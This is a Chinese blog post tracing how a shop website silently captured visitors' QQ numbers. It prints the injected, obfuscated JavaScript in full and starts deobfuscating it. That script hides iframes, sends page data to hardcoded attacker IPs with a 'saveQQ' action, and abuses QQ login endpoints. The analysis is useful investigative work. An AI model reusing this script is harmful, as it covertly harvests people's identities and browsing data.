本站木有非理性广告和有害内容,请大度地将本站加入广告屏蔽白名单吧~~~ ::博客文章推荐::

记追查QQ号泄露的过程

网络/NET 木魚 4550℃ 16评论

0.起因

刚上QQ就看到小八同学给我发来消息,说她刚打开一个网站还没看,停了十几秒的样子,就收到了这个网站发来的广告邮件,并且是准确无误地发到了她的QQ邮箱里,而她并没有用QQ登录这个网站,所以很疑惑怎么被黑的。

听到这个事儿的第一反应是,应该是广告浮窗吧——因为之前遇到过进网站然后右下角搞个假模假样的浮窗说你收到了新邮件。可是仔细看了看觉得好像是真的——

qq_webcache_xss_1

那个QQ号和名字信息确实都是正确的。既然如此,那确实有必要看一下了。

1.简单了解

祭出Fiddler抓包。清除所有浏览器缓存后,浏览目标网页(http://www.zxdl369.cn/onlineshop/fojiaoyongpin/tongzhutai/)。等待所有网页加载完成后,查看一下Fiddler中记录的请求,确实有比较奇怪的请求,这些请求的主机或网址明显与所打开的网址完全不符,其中还混入了一些不和谐的搜狗味道。

qq_webcache_xss_2

(以上已过滤掉明显无异常且与本文无关的请求)

仔细审阅这些请求后,赫然发现确实有个请求竟然返回了我的QQ号到Cookies里,而这个请求的主机很明显不是企鹅的东西。

qq_webcache_xss_3

看来必须追查了。

2.追查

既然要追查,那么就要找到源头。根据大致的判断,请求肯定出现在那些奇奇怪怪的第三方请求里(因为从这个网站做的质量来看……我觉得乃们木有这水平)。

因此找到之前那张图里第一个标注红圈儿的#13号请求。这个请求的来源是哪里呢?在Chrome中简单追查了一下,找到了来源。

qq_webcache_xss_4

……直接就是网页带进来的吗?好吧。

我们看看这个请求的内容是什么。

qq_webcache_xss_5

看起来是一段已加密的JS。

var puid="5867″;var pap="http://182.92.239.23/g.php?surl=";var pr = encodeURIComponent(document.referrer);var pu = encodeURIComponent(document.location.href);var pt = encodeURIComponent(document.title);var phead = document.getElementsByTagName('HEAD').item(0);var cslist="uid="+puid+"&r=" + pr + "&u=" + pu + "&t=" + pt;var purl = encodeURIComponent("http://42.120.11.238:8888/?action=p&"+cslist+"&f=jfif&p=");function Cimg(src) {var a = document.createElement("img");a.src = src;a.style = "display:none";};function Cifr(src) {var ifr = document.createElement("iframe");ifr.src = src;ifr.width =ifr.height= ifr.frameBorder=0;ifr.scrolling = "no";ifr.allowTransparency = "true";ifr.style.display='none';phead.appendChild(ifr);};Cifr(pap + purl);
var i_php = "http://42.120.11.238:8888/";var i_uid = "5867";var i_h="0″;var i_qq="0″;var i_d="www.zxdl369.cn"; var i_yc= 2000;var i_fkid="1416369920″;
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c–)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C j=["\\m\\l\\k\\v","\\4l\\1t\\1l\\2d","\\E\\k\\l\\1t\\s\\k\\v\\k\\o\\l\\w\\1n\\O\\1e\\q\\E\\2z\\q\\v\\k","\\p\\k\\G\\k\\p\\p\\k\\p","\\B\\p\\k\\G","\\s\\n\\u\\q\\l\\m\\n\\o","\\l\\m\\l\\s\\k","\\m\\G\\p\\q\\v\\k","\\u\\p\\k\\q\\l\\k\\1t\\s\\k\\v\\k\\o\\l","\\w\\p\\u","","\\m\\y","\\u\\w\\w\\1e\\k\\R\\l","\\w\\l\\O\\s\\k","\\1b\\m\\y\\l\\B\\N\\F\\r\\R\\L\\B\\k\\m\\E\\B\\l\\N\\F\\r\\R\\L\\y\\m\\w\\r\\s\\q\\O\\N\\o\\n\\o\\k\\L","\\w\\u\\p\\n\\s\\s\\m\\o\\E","\\o\\n","\\G\\p\\q\\v\\k\\H\\n\\p\\y\\k\\p","\\F","\\w\\k\\l\\1l\\l\\l\\p\\m\\H\\x\\l\\k","\\q\\r\\r\\k\\o\\y\\1k\\B\\m\\s\\y","\\w\\u\\p\\m\\r\\l","\\l\\O\\r\\k","\\l\\k\\R\\l\\M\\2N\\q\\X\\q\\w\\u\\p\\m\\r\\l","\\u\\B\\q\\p\\w\\k\\l","\\x\\l\\G\\1a\\1Z","\\1n\\1Y\\2d\\1X","\\1f\\2e\\2h\\P\\1c","\\t\\1f\\4j\\2e\\L\\4e\\3U\\1c\\1f\\L\\2h\\2M\\1c","\\v\\q\\l\\u\\B","\\u\\n\\n\\W\\m\\k","\\E\\k\\l\\1e\\m\\v\\k","\\w\\k\\l\\1e\\m\\v\\k","\\t","\\L\\k\\R\\r\\m\\p\\k\\w\\t","\\l\\n\\3S\\2c\\1e\\1j\\l\\p\\m\\o\\E","\\1g\\q\\u\\l\\m\\n\\o\\t\\w\\q\\X\\k\\2f\\2f\\z\\x\\m\\y\\t","\\z\\I\\1p\\t","\\z\\l\\m\\v\\k\\t","\\z\\p\\k\\G\\k\\p\\p\\k\\p\\t","\\z\\x\\p\\s\\t","\\z\\l\\m\\l\\s\\k\\t","\\z\\p\\t","\\w\\v\\k\\X\\o\\Q\\y\\x","\\M\\w\\R\\K\\r\\B\\r\\1g\\x\\m\\y\\t","\\z\\p\\k\\G\\t","\\z\\G\\x\\p\\s\\t","\\z\\G\\W\\m\\y\\t","\\z\\l\\v\\t","\\M\\v\\M\\1b\\y\\s\\K\\r\\B\\r\\1g\\u\\t","\\z\\p\\t\\V\\z\\l\\m\\v\\k\\t","\\1X","\\x\\w\\k\\p\\1l\\E\\k\\o\\l","\\m\\G\\r\\l\\x\\Q\\x","\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o","\\3N\\m\\G\\p\\q\\v\\k\\P\\w\\l\\O\\s\\k\\t\\T\\r\\n\\w\\m\\l\\m\\n\\o\\N\\q\\H\\w\\n\\s\\x\\l\\k\\L\\1b\\m\\y\\l\\B\\N\\Q\\1Z\\F\\r\\R\\L\\B\\k\\m\\E\\B\\l\\N\\1I\\1H\\1H\\r\\R\\L\\P\\v\\q\\p\\E\\m\\o\\N\\1a\\V\\Q\\F\\r\\R\\P\\F\\P\\F\\P\\1a\\1I\\1G\\F\\r\\R\\L\\G\\m\\s\\l\\k\\p\\N\\q\\s\\r\\B\\q\\1f\\n\\r\\q\\u\\m\\l\\O\\t\\F\\F\\1c\\L\\1a\\v\\n\\1p\\1a\\n\\r\\q\\u\\m\\l\\O\\N\\F\\K\\F\\L\\1a\\W\\B\\l\\v\\s\\1a\\n\\r\\q\\u\\m\\l\\O\\N\\P\\F\\K\\F\\L\\n\\r\\q\\u\\m\\l\\O\\N\\P\\F\\K\\F\\L\\T\\P\\w\\u\\p\\n\\s\\s\\m\\o\\E\\t\\T\\o\\n\\T\\P\\o\\q\\v\\k\\t\\T\\v\\H\\Q\\x\\T\\P\\m\\y\\t\\T\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o\\T\\P\\w\\p\\u\\t\\T\\B\\l\\l\\r\\N\\M\\M\\x\\m\\K\\r\\l\\s\\n\\E\\m\\o\\Y\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\1a\\H\\m\\o\\M\\s\\n\\E\\m\\o\\1g\\s\\m\\o\\W\\U\\l\\q\\p\\E\\k\\l\\t\\H\\s\\q\\o\\W\\z\\l\\q\\p\\E\\k\\l\\t\\H\\s\\q\\o\\W\\z\\q\\r\\r\\m\\y\\t\\1H\\F\\F\\F\\Y\\F\\V\\z\\y\\q\\m\\y\\t\\Y\\Y\\F\\z\\B\\m\\y\\k\\U\\x\\m\\o\\U\\l\\m\\r\\t\\V\\z\\w\\l\\O\\s\\k\\t\\V\\V\\z\\B\\m\\y\\k\\U\\u\\s\\n\\w\\k\\U\\m\\u\\n\\o\\t\\V\\z\\l\\q\\p\\E\\k\\l\\t\\w\\k\\s\\G\\z\\I\\l\\q\\p\\E\\k\\l\\t\\F\\z\\B\\m\\y\\k\\U\\l\\m\\l\\s\\k\\U\\H\\q\\p\\t\\V\\z\\w\\U\\x\\p\\s\\t\\B\\l\\l\\r\\1w\\1I\\1l\\1w\\Y\\1x\\1w\\Y\\1x\\q\\r\\r\\K\\y\\q\\l\\q\\K\\I\\I\\K\\u\\n\\v\\1w\\Y\\1x\\u\\q\\l\\k\\1w\\Y\\1x\\r\\n\\r\\1y\\n\\E\\m\\o\\T\\P\\G\\p\\q\\v\\k\\H\\n\\p\\y\\k\\p\\t\\T\\F\\T\\P\\n\\o\\s\\n\\q\\y\\t\\T\\w\\k\\l\\1e\\m\\v\\k\\n\\x\\l\\1f\\l\\n\\r\\K\\v\\H\\Q\\x\\U\\m\\G\\v\\n\\X\\k\\3L\\F\\1c\\L\\T\\3I","\\2N\\q\\X\\q\\w\\u\\p\\m\\r\\l\\N\\r\\q\\p\\k\\o\\l\\K\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o","\\r\\n\\w\\m\\l\\m\\n\\o\\N\\q\\H\\w\\n\\s\\x\\l\\k\\L\\P\\1p\\1a\\m\\o\\y\\k\\R\\N\\P\\Y\\V\\1G\\2o\\1G\\1Z\\1I\\1H\\1G\\2o\\L\\1b\\m\\y\\l\\B\\N\\Q\\F\\r\\R\\L\\P\\B\\k\\m\\E\\B\\l\\N\\Q\\F\\r\\R\\L\\P","\\n\\o\\k\\p\\p\\n\\p","\\p\\k\\l\\x\\p\\o\\P\\l\\p\\x\\k\\L","\\G\\m\\p\\w\\l\\1k\\B\\m\\s\\y","\\H\\n\\y\\O","\\m\\o\\w\\k\\p\\l\\1n\\k\\G\\n\\p\\k","\\u\\x\\p\\p\\k\\o\\l\\1j\\l\\O\\s\\k","\\E\\k\\l\\1k\\n\\v\\r\\x\\l\\k\\y\\1j\\l\\O\\s\\k","\\1a\\2M\\V","\\p\\k\\r\\s\\q\\u\\k","\\l\\n\\1y\\n\\1b\\k\\p\\1k\\q\\w\\k","\\y\\k\\G\\q\\x\\s\\l\\3E\\m\\k\\1b","\\v\\H\\Q\\x\\U\\m\\G\\v\\n\\X\\k","\\E\\k\\l\\1t\\s\\k\\v\\k\\o\\l\\1n\\O\\3D\\y","\\n\\o\\v\\n\\x\\w\\k\\v\\n\\X\\k","\\G\\n\\u\\x\\w","\\k\\X\\k\\o\\l","\\u\\s\\m\\k\\o\\l\\3x","\\u\\s\\m\\k\\o\\l\\1X","\\w\\u\\p\\n\\s\\s\\1e\\n\\r","\\y\\n\\u\\x\\v\\k\\o\\l\\1t\\s\\k\\v\\k\\o\\l","\\n\\G\\G\\w\\k\\l\\2u\\m\\y\\l\\B","\\w\\u\\p\\n\\s\\s\\1y\\k\\G\\l","\\r\\n\\w\\m\\l\\m\\n\\o","\\u\\s\\m\\k\\o\\l\\2u\\m\\y\\l\\B","\\p\\k\\s\\q\\l\\m\\X\\k","\\l\\n\\r","\\r\\R","\\s\\k\\G\\l","\\n\\o\\v\\n\\x\\w\\k\\n\\X\\k\\p","\\n\\o\\v\\n\\x\\w\\k\\n\\x\\l","\\n\\o\\H\\s\\x\\p","\\y\\m\\w\\r\\s\\q\\O","\\o\\n\\o\\k","\\k\\s\\k\\v\\k\\o\\l\\1x\\p\\n\\v\\2v\\n\\m\\o\\l","\\u\\s\\m\\u\\W","\\V","\\l\\k\\o\\u\\k\\o\\l\\N\\M\\M\\v\\k\\w\\w\\q\\E\\k\\M\\1g\\x\\m\\o\\t","\\z\\1j\\m\\l\\k\\t","\\z\\2c\\k\\o\\x\\t\\O\\k\\w","\\I\\I\\u\\B\\q\\l\\Q\\x\\V","\\B\\l\\l\\r\\N\\M\\M\\1b\\r\\s\\K\\H\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\M\\u\\n\\o\\X\\K\\r\\B\\r\\1g\\o\\x\\v\\t","\\z\\u\\H\\t\\3w\\1j\\1Y\\2z\\2v\\U\\1k\\1l\\1y\\1y\\1n\\1l\\1k\\3v\\U\\Q\\x","\\H\\m\\1p\\I\\I\\W\\k\\O","\\W\\G\\x\\m\\o","\\y\\q\\l\\q","\\B\\l\\l\\r\\N\\M\\M\\1b\\r\\y\\K\\H\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\M\\E\\k\\l\\U\\w\\m\\E\\o\\K\\r\\B\\r\\1g\\o\\q\\t","\\z\\W\\G\\x\\m\\o\\t","\\z\\q\\l\\O\\t\\F\\z\\q\\t\\F\\z\\w\\m\\y\\t\\z\\x\\m\\y\\t\\z\\x\\p\\s\\t","\\z\\y\\v\\t\\z\\u\\s\\W\\1j\\p\\u\\t\\z\\k\\R\\l\\t\\z\\u\\H\\t\\H\\m\\1p\\I\\I\\W\\k\\O\\Q\\x","\\z\\q\\v\\r\\L","\\z","\\w\\m\\E\\o","\\M","\\I\\I\\u\\B\\q\\l\\Q\\x\\Y","\\m\\o\\y\\k\\R\\1Y\\G","\\y\\n\\v\\q\\m\\o","\\I\\I\\u\\B\\q\\l\\Q\\x\\1f\\V\\1c","\\Y","\\I\\I\\u\\B\\q\\l\\Q\\x\\1f\\1c"];C 1Q=D[j[2]](j[1])[j[0]](0);C 1D=0;C 2K=0;C 1r=1L;C 1R=1M(D[j[3]]);C 1E=1M(D[j[5]][j[4]]);C 1F=1M(D[j[6]]);J 2m(b,c){C a=D[j[8]](j[7]);a[j[9]]=b;S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[13]][j[12]]=j[14];a[j[15]]=j[16];a[j[19]](j[17],j[18],0);1Q[j[20]](a)}J 1s(b,c){C a=D[j[8]](j[21]);a[j[22]]=j[23];S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[24]]=j[25];a[j[9]]=b;1Q[j[20]](a)}J 1N(b,c){C a=D[j[8]](j[7]);a[j[9]]=b;S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[13]][j[12]]=j[14];a[j[15]]=j[16];a[j[19]](j[17],j[18],0);D[j[2]](j[26])[j[0]](0)[j[20]](a)}J 2j(a){C b,2k=1z 3s(j[27]+a+j[28]);S(b=D[j[30]][j[29]](2k)){1o 3o(b[2])}1J{1o 1d}}J 2s(a,b){C c=1z 1K();c[j[32]](c[j[31]]()+2*24*1T*1T*2x);D[j[30]]=a+j[33]+3j(b)+j[34]+c[j[35]]()}J 3i(){C a=1W+j[36]+2E+j[37]+3g+j[38]+3a+j[39]+1R+j[40]+1E+j[41]+1F+j[42]+(1z 1K())[j[31]]();1s(a,j[43])}J 2a(){C a=1W+j[44]+2E+j[45]+1R+j[46]+1E+j[41]+1F+j[47]+2P+j[48]+(1z 1K())[j[31]]();2m(a)}J 2O(){C a=1W+j[49]+2P+j[2Q]+(1z 1K)[j[31]]();1s(a);1v(2L,2R)}J 2L(){S(2S==j[2T]){S(!2U[j[2V]][j[29]](/(2W|2X|2Y|2Z)/i)){S(2j(j[2I])==1d){2H()}}}}J 2H(){1m[j[1u]]=j[3b];C a=D[j[8]](j[7]);a[j[9]]=j[3c];a[j[11]]=j[1u];a[j[13]][j[12]]=j[3d];a[j[15]]=j[16];a[j[3e]]=j[3f];a[j[19]](j[17],j[18],0);C b=D[j[1h]][j[1T]];D[j[1h]][j[3h]](a,b)}J 2F(a,b){S(a[j[2D]]){1o a[j[2D]][b]}1J{S(1m[j[2B]]){1V=b[j[1U]](/([A-Z])/g,j[3k]);1V=b[j[3l]]();1o D[j[3m]][j[2B]](a,1d)[1V]}};1o 1d}1m[j[3n]]=J(){C h=D[j[1S]](j[1u]);2q(h,2n);D[j[3p]]=J(a){1r=1L;1m[j[3q]]();C b=D[j[1S]](j[1u]);C a=a||1m[j[3r]];1D=a[j[1i]];1D=a[j[1P]];C c=D[j[1h]][j[2i]]+D[j[1A]][j[2i]];C d=D[j[1A]][j[1q]]-a[j[1i]];C e=D[j[1h]][j[2g]]+D[j[1A]][j[2g]];C f=0;C g=2F(D[j[1h]],j[3t]);S(D[j[1A]][j[1C]]>D[j[1h]][j[1C]]&&g==j[3u]){f=(D[j[1A]][j[1C]]-D[j[1h]][j[1C]])/2;f=f+e;b[j[13]][j[2y]]=(c+a[j[1P]]-25)+j[1B];b[j[13]][j[2t]]=((d<b[j[1q]]?a[j[1i]]-b[j[1q]]:a[j[1i]])-f)+j[1B]}1J{f=f+e;b[j[13]][j[2y]]=(c+a[j[1P]]-25)+j[1B];b[j[13]][j[2t]]=((d<b[j[1q]]?a[j[1i]]-b[j[1q]]:a[j[1i]])+f)+j[1B]}}};J 2q(a,b){a[j[3y]]=J(){1r=3z};a[j[3A]]=J(){1r=1L};1m[j[3B]]=J(){S(1r){b()}}}J 2n(){C b=D[j[1S]](j[1u]);1v(J(){3C{b[j[13]][j[2r]]=j[2p];C a=D[j[3F]](1D,2K);a[j[3G]]()}3H(e){b[j[13]][j[2r]]=j[2p]};2a();2s(j[2I],j[2l])},2x)}J 3J(i){S(i==1){C a=j[3K]+1O+j[3M]+2G+j[3O];1N(a,j[3P])}1J{1s(j[3Q]+1O+j[3R],j[2b])}}J 3T(a){C b=a[j[2J]][j[3V]];1s(j[3W]+1O+j[3X]+b+j[3Y]+1E+j[41]+1F+j[3Z],j[2b])}J 4a(a){C b=a[j[2J]][j[4b]][j[1U]](j[4c],j[4d]);b=b[j[1U]](j[2C],j[2C]);1N(b,j[4f])}S(D[j[4g]][j[4h]](2G)>=0){2a();1v(2O,4i);S(2A==j[2l]){1v(j[4k],2w)};S(2A==j[4m]){1v(j[4n],2w)}};',62,272,'|||||||||||||||||||_0xc112|x65|x74|x69|x6F|x6E|x72|x61|x70|x6C|x3D|x63|x6D|x73|x75|x64|x26||x68|var|document|x67|x30|x66|x62|x71|function|x2E|x3B|x2F|x3A|x79|x20|x35|x78|if|x22|x5F|x31|x6B|x76|x32||||||||||||x2D|x77|x29|null|x54|x28|x3F|61|74|x53|x43|x41|window|x42|return|x7A|78|mb5u_iframe_hover|Creatjs5u|x45|54|setTimeout|x25|x46|x4C|new|77|84|81|mb5ux|i_url|i_title|x34|x36|x33|else|Date|false|encodeURIComponent|Creatif5ubody|i_qq|75|mb5u_oHead|i_referrer|70|60|66|propprop|i_php|x59|x4F|x38|||||||||||Umb5u|100|x4D|x44|x5E|x51|79|x7C|76|Gc5u|reg|93|Creatif5u|mb5uiframeclickcallback|x37|90|mb5u_iframeClick|89|Sc5u|85|x57|x50|i_yc|1000|83|x4E|i_h|64|110|63|i_uid|mb5u_GetCurrentStyle|i_d|ptU5u|53|102|mb5uy|ck5u|x24|x6A|mb5u_noLogin|i_fkid|50|500|wdl|51|navigator|52|iPhone|iPod|Android|ios|||||||||||i_time|55|56|57|58|59|i_qz|62|Q5u|escape|65|67|68|69|unescape|71|72|73|RegExp|80|82|x4B|x4A|x58|86|true|87|88|try|x49|x56|91|92|catch|x3E|qqchat5u|94|x2C|95|x3C|96|97|98|99|x47|JSONP_CALLBACK_5u|x2A|101|103|104|105|106|||||||||||bizqqkey5u|109|107|108|x5D|111|113|112|1500|x5B|114|x48|115|116′.split('|'),0,{}));

别看这段JS不长,其实还挺厉害的嘞……经过了二次混淆!我们先进行第一次反混淆。

var _0xc112=["\x69\x74\x65\x6D","\x48\x45\x41\x44″,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,"\x72\x65\x66\x65\x72\x72\x65\x72″,"\x68\x72\x65\x66″,"\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x69\x74\x6C\x65″,"\x69\x66\x72\x61\x6D\x65″,"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,"\x73\x72\x63″,"","\x69\x64″,"\x63\x73\x73\x54\x65\x78\x74″,"\x73\x74\x79\x6C\x65″,"\x77\x69\x64\x74\x68\x3A\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x30\x70\x78\x3B\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x3B","\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67″,"\x6E\x6F","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72″,"\x30″,"\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65″,"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,"\x73\x63\x72\x69\x70\x74″,"\x74\x79\x70\x65″,"\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74″,"\x63\x68\x61\x72\x73\x65\x74″,"\x75\x74\x66\x2D\x38″,"\x42\x4F\x44\x59″,"\x28\x5E\x7C\x20\x29″,"\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29″,"\x6D\x61\x74\x63\x68″,"\x63\x6F\x6F\x6B\x69\x65″,"\x67\x65\x74\x54\x69\x6D\x65″,"\x73\x65\x74\x54\x69\x6D\x65″,"\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67″,"\x3F\x61\x63\x74\x69\x6F\x6E\x3D\x73\x61\x76\x65\x51\x51\x26\x75\x69\x64\x3D","\x26\x71\x7A\x3D","\x26\x74\x69\x6D\x65\x3D","\x26\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x26\x75\x72\x6C\x3D","\x26\x74\x69\x74\x6C\x65\x3D","\x26\x72\x3D","\x73\x6D\x65\x76\x6E\x35\x64\x75″,"\x2F\x73\x78\x2E\x70\x68\x70\x3F\x75\x69\x64\x3D","\x26\x72\x65\x66\x3D","\x26\x66\x75\x72\x6C\x3D","\x26\x66\x6B\x69\x64\x3D","\x26\x74\x6D\x3D","\x2F\x6D\x2F\x77\x64\x6C\x2E\x70\x68\x70\x3F\x63\x3D","\x26\x72\x3D\x31\x26\x74\x69\x6D\x65\x3D","\x59″,"\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,"\x69\x66\x70\x74\x75\x35\x75″,"\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x77\x69\x64\x74\x68\x3A\x35\x38\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x33\x36\x36\x70\x78\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x2D\x31\x35\x30\x70\x78\x20\x30\x20\x30\x20\x2D\x33\x34\x30\x70\x78\x3B\x66\x69\x6C\x74\x65\x72\x3A\x61\x6C\x70\x68\x61\x28\x6F\x70\x61\x63\x69\x74\x79\x3D\x30\x30\x29\x3B\x2D\x6D\x6F\x7A\x2D\x6F\x70\x61\x63\x69\x74\x79\x3A\x30\x2E\x30\x3B\x2D\x6B\x68\x74\x6D\x6C\x2D\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x30\x3B\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x30\x3B\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x62\x35\x75\x22\x20\x69\x64\x3D\x22\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x75\x69\x2E\x70\x74\x6C\x6F\x67\x69\x6E\x32\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2D\x62\x69\x6E\x2F\x6C\x6F\x67\x69\x6E\x3F\x6C\x69\x6E\x6B\x5F\x74\x61\x72\x67\x65\x74\x3D\x62\x6C\x61\x6E\x6B\x26\x74\x61\x72\x67\x65\x74\x3D\x62\x6C\x61\x6E\x6B\x26\x61\x70\x70\x69\x64\x3D\x36\x30\x30\x30\x32\x30\x31\x26\x64\x61\x69\x64\x3D\x32\x32\x30\x26\x68\x69\x64\x65\x5F\x75\x69\x6E\x5F\x74\x69\x70\x3D\x31\x26\x73\x74\x79\x6C\x65\x3D\x31\x31\x26\x68\x69\x64\x65\x5F\x63\x6C\x6F\x73\x65\x5F\x69\x63\x6F\x6E\x3D\x31\x26\x74\x61\x72\x67\x65\x74\x3D\x73\x65\x6C\x66\x26\x71\x74\x61\x72\x67\x65\x74\x3D\x30\x26\x68\x69\x64\x65\x5F\x74\x69\x74\x6C\x65\x5F\x62\x61\x72\x3D\x31\x26\x73\x5F\x75\x72\x6C\x3D\x68\x74\x74\x70\x25\x33\x41\x25\x32\x46\x25\x32\x46\x61\x70\x70\x2E\x64\x61\x74\x61\x2E\x71\x71\x2E\x63\x6F\x6D\x25\x32\x46\x63\x61\x74\x65\x25\x32\x46\x70\x6F\x70\x4C\x6F\x67\x69\x6E\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x28\x74\x6F\x70\x2E\x6D\x62\x35\x75\x5F\x69\x66\x6D\x6F\x76\x65\x2C\x30\x29\x3B\x22\x3E","\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x70\x61\x72\x65\x6E\x74\x2E\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x32\x31\x34\x37\x34\x38\x33\x36\x34\x37\x3B\x77\x69\x64\x74\x68\x3A\x35\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x35\x30\x70\x78\x3B\x20″,"\x6F\x6E\x65\x72\x72\x6F\x72″,"\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64″,"\x62\x6F\x64\x79″,"\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,"\x63\x75\x72\x72\x65\x6E\x74\x53\x74\x79\x6C\x65″,"\x67\x65\x74\x43\x6F\x6D\x70\x75\x74\x65\x64\x53\x74\x79\x6C\x65″,"\x2D\x24\x31″,"\x72\x65\x70\x6C\x61\x63\x65″,"\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65″,"\x64\x65\x66\x61\x75\x6C\x74\x56\x69\x65\x77″,"\x6D\x62\x35\x75\x5F\x69\x66\x6D\x6F\x76\x65″,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65″,"\x66\x6F\x63\x75\x73″,"\x65\x76\x65\x6E\x74″,"\x63\x6C\x69\x65\x6E\x74\x58″,"\x63\x6C\x69\x65\x6E\x74\x59″,"\x73\x63\x72\x6F\x6C\x6C\x54\x6F\x70″,"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x45\x6C\x65\x6D\x65\x6E\x74″,"\x6F\x66\x66\x73\x65\x74\x57\x69\x64\x74\x68″,"\x73\x63\x72\x6F\x6C\x6C\x4C\x65\x66\x74″,"\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x63\x6C\x69\x65\x6E\x74\x57\x69\x64\x74\x68″,"\x72\x65\x6C\x61\x74\x69\x76\x65″,"\x74\x6F\x70″,"\x70\x78″,"\x6C\x65\x66\x74″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6F\x75\x74″,"\x6F\x6E\x62\x6C\x75\x72″,"\x64\x69\x73\x70\x6C\x61\x79″,"\x6E\x6F\x6E\x65″,"\x65\x6C\x65\x6D\x65\x6E\x74\x46\x72\x6F\x6D\x50\x6F\x69\x6E\x74″,"\x63\x6C\x69\x63\x6B","\x31″,"\x74\x65\x6E\x63\x65\x6E\x74\x3A\x2F\x2F\x6D\x65\x73\x73\x61\x67\x65\x2F\x3F\x75\x69\x6E\x3D","\x26\x53\x69\x74\x65\x3D","\x26\x4D\x65\x6E\x75\x3D\x79\x65\x73″,"\x71\x71\x63\x68\x61\x74\x35\x75\x31″,"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x70\x6C\x2E\x62\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2F\x63\x6F\x6E\x76\x2E\x70\x68\x70\x3F\x6E\x75\x6D\x3D","\x26\x63\x62\x3D\x4A\x53\x4F\x4E\x50\x5F\x43\x41\x4C\x4C\x42\x41\x43\x4B\x5F\x35\x75″,"\x62\x69\x7A\x71\x71\x6B\x65\x79″,"\x6B\x66\x75\x69\x6E","\x64\x61\x74\x61″,"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x70\x64\x2E\x62\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2F\x67\x65\x74\x5F\x73\x69\x67\x6E\x2E\x70\x68\x70\x3F\x6E\x61\x3D","\x26\x6B\x66\x75\x69\x6E\x3D","\x26\x61\x74\x79\x3D\x30\x26\x61\x3D\x30\x26\x73\x69\x64\x3D\x26\x75\x69\x64\x3D\x26\x75\x72\x6C\x3D","\x26\x64\x6D\x3D\x26\x63\x6C\x6B\x53\x72\x63\x3D\x26\x65\x78\x74\x3D\x26\x63\x62\x3D\x62\x69\x7A\x71\x71\x6B\x65\x79\x35\x75″,"\x26\x61\x6D\x70\x3B","\x26″,"\x73\x69\x67\x6E","\x2F","\x71\x71\x63\x68\x61\x74\x35\x75\x32″,"\x69\x6E\x64\x65\x78\x4